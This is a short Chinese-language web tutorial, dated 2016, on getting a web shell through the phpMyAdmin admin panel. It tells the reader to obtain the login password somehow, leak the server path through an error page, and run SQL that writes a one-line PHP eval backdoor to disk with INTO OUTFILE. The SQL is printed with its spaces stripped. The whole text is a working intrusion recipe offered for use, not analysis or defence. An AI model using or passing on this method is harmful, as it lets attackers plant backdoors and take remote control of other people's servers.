phpMyAdmin 后台拿webshell
发布时间:2016-12-26 来源:查字典编辑
摘要:1.如何拿到登陆密码.自己想办法2.访问:http://url/phpmyadmin/libraries/select_lang.lib.p...
1.如何拿到登陆密码.自己想办法
2.访问:http://url/phpmyadmin/libraries/select_lang.lib.php得到物理路径.
3.选择一个Database.运行以下语句.
----startcode---
CreateTABLEa(cmdtextNOTNULL);
InsertINTOa(cmd)VALUES('<?phpeval($_POST[1]);?>');
selectcmdfromaintooutfile'D:/phpMyAdmin/libraries/d.php';
DropTABLEIFEXISTSa;
----endcode---
4.如果没什么意外.对应网站得到webshell